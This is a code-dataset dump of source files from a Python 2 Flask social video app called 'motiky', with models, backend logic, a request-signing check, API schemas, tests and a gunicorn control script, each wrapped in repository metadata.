'postgresql+psycopg2://user:password@localhost/motiky'\n DEBUG = True\n\n" }, { "alpha_fraction": 0.7770270109176636, "alphanum_fraction": 0.7804054021835327, "avg_line_length": 16.294116973876953, "blob_id": "63c63aa951b470390c442ad49eb0109f86d471e1", "content_id": "868a9ff3fb6b7a2cb3c251e8d3aa72f2db4d633a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 52, "num_lines": 17, "path": "/motiky/logic/__init__.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport logic_user\nimport logic_post\nimport logic_action\nimport logic_activity\nimport logic_feed\nimport logic_tag\nimport logic_comment\nimport logic_other\n\n# import some other logic here\n\n\nfrom motiky import coreutil\n\nbackend = coreutil.Backend(coreutil.backend_mapping)\n\n\n" }, { "alpha_fraction": 0.6236559152603149, "alphanum_fraction": 0.6344085931777954, "avg_line_length": 14.166666984558105, "blob_id": "2104f689436bfe87e117ff3e92e3ae5b96655a5c", "content_id": "27b8bfd15598f313d4fc0962ab6954faf730d01b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/motiky/helpers.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit <[email protected]>\n\nimport functools\n\nfrom flask import g\n\n\n" }, { "alpha_fraction": 0.5972937941551208, "alphanum_fraction": 0.6198453903198242, "avg_line_length": 29.372549057006836, "blob_id": "a14d75e316111a7b69563931b908f42c3adddc44", "content_id": "255f88554a507aac43e5f7d7b44d44af614292a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 87, "num_lines": 51, "path": "/tests/test_tag.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action,Tag,Tagging\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestTag(TestCase):\n\n\n def test_tag_view(self):\n tag1 = Tag(name='tag1',show=True,pic_url='pic_url',\n recommended=True)\n tag2 = Tag(name='tag2',show=True,pic_url='pic_url',\n recommended=True)\n db.session.add(tag1)\n db.session.add(tag2)\n db.session.commit()\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n tagging1 = Tagging(taggable_type='post',taggable_id=post1['id'],tag_id=tag1.id)\n tagging2 = Tagging(taggable_type='post',taggable_id=post2['id'],tag_id=tag1.id)\n\n headers = self.generate_header('weibo_id01')\n # get\n resp = self.client.get('/tag/%d'% tag1.id,headers=headers)\n data_get = json.loads(resp.data)\n assert data_get['tag']['name'] == 'tag1'\n\n # get tags \n resp = self.client.get('/tags',headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['results']) == 2\n\n\n\n" }, { "alpha_fraction": 0.6004018187522888, "alphanum_fraction": 0.6092841029167175, "avg_line_length": 
33.630035400390625, "blob_id": "d987aa5a5cb04fe4048ffbe31d9f8a39f3fc8b11", "content_id": "8a92fc1229e9c9403bd73e928e1d6f4408e1d7b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9457, "license_type": "no_license", "max_line_length": 82, "num_lines": 273, "path": "/motiky/logic/models.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\n# add your models here\nimport os\nimport uuid\nimport contextlib\nfrom datetime import datetime\n\nfrom flask import current_app\nfrom werkzeug import cached_property\nfrom sqlalchemy.dialects.postgresql import ARRAY,UUID\n\nfrom motiky.configs import db,DefaultConfig\n\nDATE_FMT = '%Y-%m-%d %H:%M:%S'\nDATE_DEFAULT = '2013-05-30 12:00:00'\n\ndef format_date(date):\n return date.strftime(DATE_FMT) if date else DATE_DEFAULT\n\nclass User(db.Model):\n\n __tablename__ = 'user_info' \n id = db.Column(db.Integer,primary_key=True)\n username = db.Column(db.String(50))\n email = db.Column(db.String(50),unique=True)\n photo_url = db.Column(db.String(100))\n signature = db.Column(db.String(255))\n status = db.Column(db.String(20))\n uid = db.Column(db.String(100),index=True,unique=True)\n push_on = db.Column(db.Boolean,default=True)\n access_token = db.Column(db.String(128))\n date_create = db.Column(db.DateTime,default=datetime.now)\n date_update = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n username=self.username,\n email=self.email,\n photo_url=self.photo_url,\n signature=self.signature,\n status=self.status,\n uid=str(self.uid),\n push_on=self.push_on,\n access_token=self.access_token,\n date_create=format_date(self.date_create),\n date_update=format_date(self.date_update))\n\n\nclass Post(db.Model):\n\n __tablename__ = 'post'\n id = db.Column(db.Integer,primary_key=True)\n title = db.Column(db.String(300))\n pic_small = db.Column(db.String(255))\n pic_big = db.Column(db.String(255))\n video_url = db.Column(db.String(255))\n author_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n show = db.Column(db.Boolean,default=True,index=True)\n recommended = db.Column(db.Boolean,default=False,index=True)\n play_count = db.Column(db.Integer,default=0)\n date_create = db.Column(db.DateTime,default=datetime.now)\n date_update = db.Column(db.DateTime,default=datetime.now)\n date_publish = db.Column(db.DateTime,default=datetime.now)\n user = db.relation(User, innerjoin=True, lazy=\"joined\")\n\n @cached_property\n def json(self):\n video_prefix = current_app.config.get('VIDEO_URL_PREFIX') if current_app \\\n else DefaultConfig.VIDEO_URL_PREFIX\n return dict(id=self.id,\n title=self.title,\n pic_big=self.pic_big,\n pic_small=os.path.join(video_prefix,self.pic_small or ''),\n video_url=os.path.join(video_prefix,self.video_url or ''),\n author_id=self.author_id,\n show=self.show,\n recommended=self.recommended,\n play_count=self.play_count,\n date_create=format_date(self.date_create),\n date_update=format_date(self.date_update),\n date_publish=format_date(self.date_publish))\n\n\nclass Report(db.Model):\n\n __tablename__ = 'report'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n post_id = db.Column(db.Integer,db.ForeignKey(Post.id),index=True)\n user = db.relation(User,innerjoin=True,lazy='joined')\n post = db.relation(Post,innerjoin=True,lazy='joined')\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass 
Install(db.Model):\n\n __tablename__ = 'install'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True,unique=True)\n version = db.Column(db.String(20))\n badge = db.Column(db.Integer,default=0)\n device_token = db.Column(db.String(100),index=True)\n device_type = db.Column(db.String(20))\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @property\n def json(self):\n return dict(id=self.id,\n user_id=self.user_id,\n version=self.version,\n badge=self.badge,\n device_token=self.device_token,\n device_type=self.device_type,\n date_create=format_date(self.date_create))\n\n\nclass UserFollowAsso(db.Model):\n\n __tablename__ = 'user_follow_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n user_id_to = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n __table_args__ = (\n db.UniqueConstraint('user_id','user_id_to'),\n )\n\n\nclass UserLikeAsso(db.Model):\n \n __tablename__ = 'user_like_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer,db.ForeignKey(User.id),index=True)\n post_id = db.Column(db.Integer,db.ForeignKey(Post.id),index=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n __table_args__ = (\n db.UniqueConstraint('user_id','post_id'),\n )\n\nclass UserPlayAsso(db.Model):\n\n __tablename__ = 'user_play_asso'\n id = db.Column(db.Integer,primary_key=True)\n user_id = db.Column(db.Integer)\n post_id = db.Column(db.Integer)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass Comment(db.Model):\n\n __tablename__ = 'comment'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer,index=True)\n author_id = db.Column(db.Integer,db.ForeignKey(User.id))\n content = db.Column(db.String(1000))\n show = db.Column(db.Boolean,default=True)\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n author_id=self.author_id,\n content=self.content,\n show=self.show,\n date_create=format_date(self.date_create))\n\n\nclass Activity(db.Model):\n\n __tablename__ = 'activity'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer)\n comment_id = db.Column(db.Integer)\n from_id = db.Column(db.Integer)\n to_id = db.Column(db.Integer)\n atype = db.Column(db.String(20))\n # atype follow like comment post_reco text \n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n comment_id=self.comment_id,\n from_id=self.from_id,\n to_id=self.to_id,\n atype=self.atype,\n date_create=format_date(self.date_create))\n\n\nclass Action(db.Model):\n\n __tablename__ = 'action'\n id = db.Column(db.Integer,primary_key=True)\n post_id = db.Column(db.Integer)\n user_id = db.Column(db.Integer,index=True)\n atype = db.Column(db.String(20),index=True)\n payload = db.Column(db.String(255))\n date_create = db.Column(db.DateTime,default=datetime.now)\n\n @cached_property\n def json(self):\n return dict(id=self.id,\n post_id=self.post_id,\n user_id=self.user_id,\n atype=self.atype,\n payload=self.payload,\n date_create=format_date(self.date_create))\n\n\nclass Tag(db.Model):\n\n __tablename__ = 'tag'\n id = db.Column(db.Integer,primary_key=True)\n name = db.Column(db.String(255),index=True)\n show = 
db.Column(db.Boolean,default=True)\n    pic_url = db.Column(db.String(255))\n    order_seq = db.Column(db.Integer,default=0)\n    recommended = db.Column(db.Boolean,default=False)\n    date_create = db.Column(db.DateTime,default=datetime.now)\n    \n    @cached_property\n    def json(self):\n        return dict(id=self.id,\n                name=self.name,\n                show=self.show,\n                pic_url=self.pic_url,\n                order_seq=self.order_seq,\n                recommended=self.recommended,\n                date_create=format_date(self.date_create))\n\n\nclass Tagging(db.Model):\n\n    __tablename__ = 'tagging'\n    id = db.Column(db.Integer,primary_key=True)\n    taggable_type = db.Column(db.String(20))\n    taggable_id = db.Column(db.Integer)\n    tag_id = db.Column(db.Integer)\n    user_id = db.Column(db.Integer)\n    date_create = db.Column(db.DateTime,default=datetime.now)\n\n    @cached_property\n    def json(self):\n        return dict(id=self.id,\n                taggable_type=self.taggable_type,\n                taggable_id=self.taggable_id,\n                tag_id=self.tag_id,\n                user_id=self.user_id,\n                date_create=format_date(self.date_create))\n\n\nclass Storage(db.Model):\n    __tablename__ = 'storage'\n    id = db.Column(UUID(),default=lambda:str(uuid.uuid4()),primary_key=True)\n    file_md5 = db.Column(db.String(80))\n    file_size = db.Column(db.Integer)\n    date_create = db.Column(db.DateTime,default=datetime.now)\n\n\nclass CmsUser(db.Model):\n    __tablename__ = 'cms_user'\n    id = db.Column(db.Integer,primary_key=True)\n    username = db.Column(db.String(50))\n    email = db.Column(db.String(50))\n    password = db.Column(db.String(80))\n    date_create = db.Column(db.DateTime,default=datetime.now)\n\n\n\n" }, { "alpha_fraction": 0.48322147130966187, "alphanum_fraction": 0.5402684807777405, "avg_line_length": 22.84000015258789, "blob_id": "e0da33bb9642d0ac451f41ec560dc02edbfb9d5b", "content_id": "f4aff616b7f2ab9bfcfad4ce6843a8ab5b4ceb5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 596, "license_type": "no_license", "max_line_length": 88, "num_lines": 25, "path": "/ctlapp.sh", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "#! 
/usr/bin/env bash\n\n# Author: liulianxiang <[email protected]>\n\n\nMAINMODULE=manage:app\n\ncase $1 in\n    start)\n        exec gunicorn -D -w 4 -k gevent -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n        ;;\n    stop)\n        kill -INT `cat /tmp/motiky.pid`\n        ;;\n    restart)\n        kill -INT `cat /tmp/motiky.pid`\n        exec gunicorn -D -w 4 -k gevent -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n        ;;\n    debug)\n        exec gunicorn -w 4 -p /tmp/motiky.pid -b 127.0.0.1:9090 $MAINMODULE\n        ;;\n    *)\n        echo \"./ctlapp.sh start | stop | restart | debug\"\n        ;;\nesac\n" }, { "alpha_fraction": 0.5481978058815002, "alphanum_fraction": 0.5892707705497742, "avg_line_length": 25.869565963745117, "blob_id": "b8e37b412fed8edd5ae4b9bb8fd2db03092468e6", "content_id": "01f77c2b367a8825549b51fc917d565c41bfee83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1207, "license_type": "no_license", "max_line_length": 94, "num_lines": 46, "path": "/motiky/strutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nimport time\nimport datetime\nfrom email.utils import formatdate\n\ndef extract_tags(s):\n    tags = re.findall(r'''#(\\w+)?#''',s)\n    return set(tags) if tags else []\n\ndef read_data(_file):\n    file_data = ''\n    data = _file.read(8192)\n    while data:\n        file_data += data\n        data = _file.read(8192)\n    return file_data\n\ndef cookie_date(epoch_seconds=None):\n    rfcdate = formatdate(epoch_seconds)\n    return '%s-%s-%s GMT' % (rfcdate[:7], rfcdate[8:11], rfcdate[12:25])\n\ndef int2path(uint,baseurl,extname):\n    \"\"\"Convert a 32-bit unsigned int into a path.\"\"\"\n    file_key = ''\n    for i in range(6):\n        uint,remainder = divmod(uint,36)\n        if remainder < 10:\n            file_key = chr(remainder+48) + file_key\n        else:\n            file_key = chr(remainder+97-10) + file_key\n    fullurl = os.path.join(baseurl,file_key[0:2],file_key[2:4],file_key[4:6],file_key+extname)\n    return fullurl\n\ndef int2ukey(uint):\n    ukey = ''\n    for i in range(6):\n        uint,remainder = divmod(uint,36)\n        if remainder < 10:\n            ukey = chr(remainder+48) + ukey\n        else:\n            ukey = chr(remainder+97-10) + ukey\n    return ukey\n\n\n\n" }, { "alpha_fraction": 0.6337719559669495, "alphanum_fraction": 0.640350878238678, "avg_line_length": 27.046154022216797, "blob_id": "607432e94a05538b489f9e4dfdc818a2e034d15c", "content_id": "073b75da79b53e772ecea4964c4c4d78c43f9572", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1824, "license_type": "no_license", "max_line_length": 70, "num_lines": 65, "path": "/motiky/logic/logic_other.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-02-01\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Install,Storage\n\nfrom motiky.configs import db\n\n\n@register('get_install_by_user')\ndef get_install_by_user(user_id):\n    _in = Install.query.filter(Install.user_id == user_id).first()\n    if _in is None:\n        raise BackendError('EmptyError','install does not exist')\n    return _in.json\n\n@register('new_install')\ndef new_install(user_id,device_token,version='',device_type=''):\n    assert_error(type(user_id) == types.IntType,'ParamError')\n    assert_error(type(device_token) == types.StringType,'ParamError')\n    \n    install = Install(user_id=user_id,\n            device_token=device_token,\n            version=version,\n            device_type=device_type)\n\n    try:\n        db.session.add(install)\n        
db.session.commit()\n    except:\n        db.session.rollback()\n        raise\n    return install.json\n\n@register('set_install')\ndef set_install(user_id,idict):\n    install = Install.query.filter(Install.user_id == user_id).first()\n    if install is None:\n        raise BackendError('EmptyError','install does not exist')\n    for k,v in idict.items():\n        if v:\n            setattr(install,k,v)\n    try:\n        db.session.commit()\n    except:\n        db.session.rollback()\n        raise BackendError('InternalError',traceback.format_exc())\n    else:\n        return install.json\n\n@register('add_file_data')\ndef add_file_data(file_size,file_md5):\n    st = Storage(file_size=file_size,file_md5=file_md5)\n    try:\n        db.session.add(st)\n        db.session.commit()\n    except:\n        db.session.rollback()\n        raise BackendError('InternalError',traceback.format_exc())\n    return st.id\n\n" }, { "alpha_fraction": 0.6742061972618103, "alphanum_fraction": 0.6776859760284424, "avg_line_length": 23.978260040283203, "blob_id": "fb282654745a7e94459162f77ae1bab2775839d0", "content_id": "50eb5b66074eae82f0c0c8a457b8d21d7073235b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2299, "license_type": "no_license", "max_line_length": 84, "num_lines": 92, "path": "/motiky/application.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport logging\nimport hmac\n\nfrom flask import g\nfrom flask import Flask\nfrom flask import request\nfrom flask import make_response\nfrom flask import session\n\nfrom motiky import configs\nfrom motiky.configs import db,cache,mail,redis\n\nfrom motiky import logic\nfrom motiky import authutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.views import user,post,tag,feed,\\\n        activity,comment\n\n# add some other view\n\n__all__ = ['create_app']\n\n\nDEFAULT_APP_NAME = 'motiky'\n\n\ndef create_app(config=None,app_name=None):\n    \n    if app_name is None:\n        app_name = DEFAULT_APP_NAME\n    \n    app = Flask(app_name)\n\n    configure_app(app,config)\n    configure_db(app)\n    configure_blueprints(app)\n    configure_cache(app)\n    configure_handler(app)\n    return app\n\ndef configure_app(app,config):\n    app.config.from_object(configs.DefaultConfig())\n\n    if config is not None:\n        app.config.from_object(config)\n\n    app.config.from_envvar('APP_CONFIG',silent=True)\n\ndef configure_db(app):\n    db.init_app(app)\n\ndef configure_cache(app):\n    redis.init_app(app)\n\ndef configure_handler(app):\n\n    @app.before_request\n    def authorize():\n        print request.headers\n        if request.path.startswith('/admin'):\n            return\n\n        token = request.headers.get('X-MOTIKY-TOKEN') or ''\n        tokens = token.split('|')\n        if len(tokens) != 3:\n            print 'invalid request'\n            response = make_response('invalid request',403)\n            return response\n\n        ukey,_time,signature = tokens\n        print ukey,_time,signature\n        sign = hmac.new(app.config.get('APPLICATION_SECRET'),ukey+_time).hexdigest()\n        if sign != signature:\n            print 'sign != signature, invalid request'\n            response = make_response('invalid request',403)\n            return response\n        g.ukey = ukey\n\n\ndef configure_blueprints(app):\n    app.register_blueprint(user.instance,url_prefix=None)\n    app.register_blueprint(post.instance,url_prefix=None)\n    app.register_blueprint(tag.instance,url_prefix=None)\n    app.register_blueprint(feed.instance,url_prefix=None)\n    app.register_blueprint(comment.instance,url_prefix=None)\n    app.register_blueprint(activity.instance,url_prefix=None)\n\n" }, { "alpha_fraction": 0.5593220591545105, "alphanum_fraction": 0.564769983291626, 
"avg_line_length": 25.206348419189453, "blob_id": "0f4d6b8fbed035b4f9bfb485b11066a3cac35fc9", "content_id": "e6f3b2150aaa609d766e2064dac5dbf384503ac0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/motiky/authutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport time\nimport hmac\nimport datetime\nimport hashlib\nfrom hashlib import sha1,md5\n\nimport strutil\n\nfrom flask import g,request,redirect,session\nfrom flask import current_app as app\n\nfrom motiky.configs import db,redis\nfrom motiky.logic.models import User\n\ndef user_required(f):\n \"\"\"必须登陆后才能访问的视图\"\"\"\n def decorator(*args,**kwargs):\n ukey = g.ukey\n if not ukey:\n return make_response('need a user',403)\n rp = redis.pipeline()\n rp.exists('USER-UKEY::%s'%ukey)\n rp.get('USER-UKEY::%s'%ukey)\n res = iter(rp.execute())\n \n if not res.next():\n # redis 中不存在 插数据库\n user = db.session.query(User).filter(User.uid == ukey).first()\n if user is None:\n res = make_response('the user does not exist',403)\n return res\n g.user_id = user.id\n rp.set('USER-UKEY::%s'%ukey,user.id)\n rp.execute()\n else:\n g.user_id = int(res.next())\n return f(*args,**kwargs)\n return decorator\n\ndef get_user_id(ukey):\n \"\"\"根据ukey来获取user_id\"\"\"\n if not ukey:\n return None\n rp = redis.pipeline()\n rp.exists('USER-UKEY::%s'%ukey)\n rp.get('USER-UKEY::%s'%ukey)\n res = iter(rp.execute())\n\n user_id = None\n if not res.next():\n user = db.session.query(User).filter(User.uid == ukey).first()\n if user is None:\n return None\n g.user_id = user_id = user.id\n rp.set('USER-UKEY::%s'%ukey,user.id)\n rp.execute()\n else:\n g.user_id = user_id = int(res.next())\n return user_id\n\n" }, { "alpha_fraction": 0.7145413756370544, "alphanum_fraction": 0.7185682058334351, "avg_line_length": 30.899999618530273, "blob_id": "16c684214b02cf6b781ebd363234451f7d4b3407", "content_id": "852cb43aab5a3278d60d68d46c9d75b05a9e42d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2235, "license_type": "no_license", "max_line_length": 67, "num_lines": 70, "path": "/motiky/schema.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# the schema for motiky's api\n\nimport colander\nfrom datetime import datetime\nfrom colander import SchemaNode,MappingSchema,SequenceSchema\nfrom colander import Int,Date,String,Bool,DateTime\nfrom colander import Range,Length\n\nclass IdListSchema(SequenceSchema):\n id = SchemaNode(Int(),validator=Range(min=1))\n\nclass StrListSchema(SequenceSchema):\n _str = SchemaNode(String())\n\nclass LimitOffsetSchema(MappingSchema):\n offset = SchemaNode(Int())\n limit = SchemaNode(Int())\n\nclass NewUserSchema(MappingSchema):\n uid = SchemaNode(String())\n access_token = SchemaNode(String(),missing=u'')\n\nclass UpdateUserSchema(MappingSchema):\n username = SchemaNode(String(encoding='utf-8'),missing=None)\n photo_url = SchemaNode(String(encoding='utf-8'),missing=None)\n signature = SchemaNode(String(encoding='utf-8'),missing=None)\n access_token = SchemaNode(String(encoding='utf-8'),missing=u'')\n status = SchemaNode(String(encoding='utf-8'),missing=None)\n date_update = SchemaNode(DateTime(),missing=None)\n\nclass UserFollowSchema(MappingSchema):\n user_ids = IdListSchema()\n\nclass InstallSchema(MappingSchema):\n device_type = 
SchemaNode(String())\n device_token = SchemaNode(String())\n version = SchemaNode(String())\n user_id = SchemaNode(Int())\n\n\nclass PushSchema(MappingSchema):\n user_id = SchemaNode(Int())\n install_id = SchemaNode(String())\n action = SchemaNode(String())\n \nclass NewPostSchema(MappingSchema):\n title = SchemaNode(String(),missing=None)\n author_id = SchemaNode(Int())\n #tag_id = SchemaNode(Int(),missing=None)\n\nclass UpdatePostSchema(MappingSchema):\n title = SchemaNode(String(encoding='utf-8'),missing=None)\n author_id = SchemaNode(Int(),missing=None)\n pic_small = SchemaNode(String(encoding='utf-8'),missing=None)\n date_update = SchemaNode(DateTime(),missing=datetime.now())\n\nclass NewCommentSchema(MappingSchema):\n post_id = SchemaNode(Int())\n author_id = SchemaNode(Int())\n content = SchemaNode(String())\n\nclass PostLikeSchema(MappingSchema):\n user_id = SchemaNode(Int())\n post_id = SchemaNode(Int())\n\nclass PostUnlikeSchema(MappingSchema):\n user_id = SchemaNode(Int())\n post_id = SchemaNode(Int())\n\n\n" }, { "alpha_fraction": 0.6540540456771851, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 18.034482955932617, "blob_id": "6582964f86e55d3942b8e1f94492da53391b38f2", "content_id": "12c61cd37b00c6f61f2e75cc7dc1e6a037fa5441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 555, "license_type": "no_license", "max_line_length": 66, "num_lines": 29, "path": "/motiky/logic/logic_action.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-01-30\n\nimport types\nimport traceback\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Action\n\nfrom motiky.configs import db\n\n\n\n@register('add_action')\ndef add_action(ainfo={}):\n action = Action(**ainfo)\n try:\n db.session.add(action)\n db.session.commit()\n except:\n db.session.rollback()\n raise BackendError('InternalError',traceback.format_exc())\n else:\n return action.json\n\n\n# add some other\n\n\n\n" }, { "alpha_fraction": 0.5522071123123169, "alphanum_fraction": 0.5645161271095276, "avg_line_length": 29.545454025268555, "blob_id": "0c8967172f0dc89cde3a49a2a3843e28ebd1843b", "content_id": "ade8c0f483e16b1921b29bbb00b075f588d8558a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2356, "license_type": "no_license", "max_line_length": 80, "num_lines": 77, "path": "/tests/test_user.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestUser(TestCase):\n\n\n def test_user_view(self):\n \n # post\n headers = self.generate_header('weibo_id1')\n data = {'uid':'weibo_id1',\n 'access_token':'1111111111'}\n resp = self.client.post('/user',data=json.dumps(data),\n headers=headers,content_type='application/json')\n print resp.data\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['uid'] == 'weibo_id1'\n assert _data['access_token'] == '1111111111'\n\n # get\n resp = self.client.get('/user/%d'%_data['id'],headers=headers)\n data_get = 
json.loads(resp.data)\n        assert data_get['uid'] == 'weibo_id1'\n\n        # put\n        put_in = {'photo_url':'put_url','date_upate':str(datetime.now())}\n        resp = self.client.put('/user/%d'%_data['id'],\n                data=json.dumps(put_in),headers=headers,\n                content_type='application/json')\n        print resp.data\n        assert resp.status_code == 204\n\n    def test_install(self):\n        user1 = backend.add_user('username01','photo_url01','weibo_id01')\n        device_token = 'device_token'\n        \n        headers = self.generate_header('weibo_id01')\n        \n        data = {\n            'device_type':'ios',\n            'device_token':device_token,\n            'version':'1.1.10',\n            'user_id':user1['id']\n        }\n\n        resp = self.client.post('/install',data=json.dumps(data),\n                headers=headers,content_type='application/json')\n\n        _data = json.loads(resp.data)\n        install_id = _data['install_id']\n        \n        install = Install.query.filter(Install.user_id == user1['id']).first()\n        assert install is not None\n        assert install.device_token.encode('utf-8') == device_token\n\n    def test_user_follow(self):\n        headers = self.generate_header('weibo_id01')\n        pass\n\n\n\n\n" }, { "alpha_fraction": 0.6410356760025024, "alphanum_fraction": 0.6488819122314453, "avg_line_length": 30.432098388671875, "blob_id": "4b054b747c1d2780e2ea88f07703f164e309d34e", "content_id": "c9efead97232e771d7e60a599e4d75f6242ad2bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2565, "license_type": "no_license", "max_line_length": 74, "num_lines": 81, "path": "/motiky/logic/logic_comment.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# author: notedit\n# date: 2013-04-15\n\nimport types\nimport traceback\n\n\nfrom motiky.coreutil import BackendError,register,assert_error\n\nfrom motiky.logic.models import User,Post,Comment\n\nfrom motiky.configs import db,redis\n\n\n@register('add_comment')\ndef add_comment(post_id,content,author_id):\n    assert_error(type(post_id) == types.IntType,'ParamError')\n    assert_error(type(author_id) == types.IntType,'ParamError')\n    assert_error(type(content) == types.StringType,'ParamError')\n\n    qd = {\n        'post_id':post_id,\n        'content':content,\n        'author_id':author_id\n    }\n    co = Comment(**qd)\n    try:\n        db.session.add(co)\n        db.session.commit()\n    except:\n        db.session.rollback()\n        raise BackendError('InternalError',traceback.format_exc())\n    return co.json\n\n@register('set_comment')\ndef set_comment(comment_id,dinfo):\n    keys_set = ('post_id','author_id','content','show','date_create')\n    if not set(dinfo.keys()).issubset(keys_set):\n        raise BackendError('ParamError','fields not allowed to be updated')\n    comment = Comment.query.get(comment_id)\n    for key,value in dinfo.items():\n        if value is not None:\n            setattr(comment,key,value)\n    try:\n        db.session.commit()\n    except Exception,ex:\n        db.session.rollback()\n        raise BackendError('InternalError',traceback.format_exc())\n    return comment.json\n\n@register('get_comment')\ndef get_comment(comment_id):\n    assert_error(type(comment_id) == types.IntType,'ParamError')\n    comm = Comment.query.get(comment_id)\n    return comm.json\n\n@register('get_post_comment')\ndef get_post_comment(post_id,limit=50,offset=0,show=True):\n    assert_error(type(post_id) == types.IntType,'ParamError')\n    _ans = [Comment.show == True,] if show else []\n    _ans.append(Comment.post_id == post_id)\n    q = reduce(db.and_,_ans)\n    comms = Comment.query.filter(q).order_by(Comment.date_create.desc()).\\\n            limit(limit).offset(offset).all()\n    return [c.json for c in comms]\n\n@register('get_post_comment_count')\ndef 
